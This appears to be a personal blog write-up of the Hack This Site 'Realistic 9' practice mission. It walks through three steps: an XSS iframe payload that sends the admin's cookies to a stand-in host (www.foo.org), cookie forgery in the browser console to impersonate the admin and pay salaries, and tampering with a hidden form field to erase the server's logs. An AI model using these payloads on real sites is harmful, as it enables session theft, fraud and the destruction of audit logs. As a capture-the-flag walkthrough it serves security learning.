What is it? @.@

Here is the place where I record some tactics about wargames, systems, and other security issues.

2012-10-06

Hack This Site! - Realistic 9

Description:
CrappySoft Software
The boss over at CrappySoft has stopped paying his employees, and your friend is in need of money, fast. Help them get their salary paid. 
Level 9
From: 

Message: Hey man,
I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:

Username: r-conner@crappysoft.com
Password: ilovemywork

Thanks man, good luck.
Solution:
  1. At first I tried SQL injection against the login page and some of the forms, but got nowhere.
  2. Since we were given a username and password, maybe there's something interesting in the pages behind the login.
  3. After logging in, we get two more pages, called "Private Message" and "Pay Salaries".
  4. Because we are not an administrator, clicking the "Pay Salaries" page shows "You are not an administrator".
  5. On the PM page there's a form we can use to send "something" to the administrator, whose username is "m-crap".
  6. Check the cookies: there are three interesting values, 'strUsername', 'strPassword', and 'intID'.
  7. How about XSS? I used the XSS payload below to steal the administrator's cookies.
    To:m-crap(owner)
    Subject:hi, m-crap
    Message: hi<iframe frameborder=0 height=0 width=0 src=javascript:void(window.location="www.foo.org/get_your_cookie.php?c=" + document.cookie)</iframe>
  8. The page will then show you the contents of the cookies belonging to m-crap.
    Checking the XSS itself is beyond the scope of this mission, so assume you got this cookie:
    strUsername=m-crap%40crappysoft.com; strPassword=94a35a3b7befff5eb2a8415af04aa16c; intID=1;
  9. Now I use the JavaScript below in the JavaScript Console in Google Chrome to modify my cookie values.
    javascript:document.cookie="strUsername=m-crap%40crappysoft.com"; 
    javascript:document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";
    javascript:document.cookie="intID=1";
  10. Visit the "Pay Salaries" page and click the "Pay" button to achieve our goal. After doing so, there's one more job to do, and the message below points the way.
    YHEE THANKS MAN!! Thank's for my salary you really own!! dont forget to clean the logs by subscribing to them!!
  11. Since the hint says "dont forget to clean the logs by subscribing to them!!", let's check the 'Mailing List' page.
  12. The page text below tells us it will add our email and validate the mailing list at the same time, deleting every entry without an '@' character.
    (Note: This adds your email to the list, and at the same time, checks the list for anything without the '@' character and deletes it.)
  13. View the page source. There's a hidden form field naming a file, './files/mailinglist/addresses.txt'.
    <input type="hidden" name="strFilename" value="./files/mailinglist/addresses.txt">
  14. Directory indexing is enabled on the 'files' directory, and it contains a log file.
    hxxp://www.hackthissite.org/missions/realistic/9/files/logs/logs.txt
    Index of /missions/realistic/9/files

    • Parent Directory
    • downloads/
    • logs/
    • mailinglist/
  15. Use the JavaScript below to change the value of the strFilename field in the 'Mailing List' form, then subscribe.
    javascript:alert(document.forms[0].strFilename.value="./files/logs/logs.txt");
  16. Good Job, OOXXOOXX, You have successfully completed Mission 9.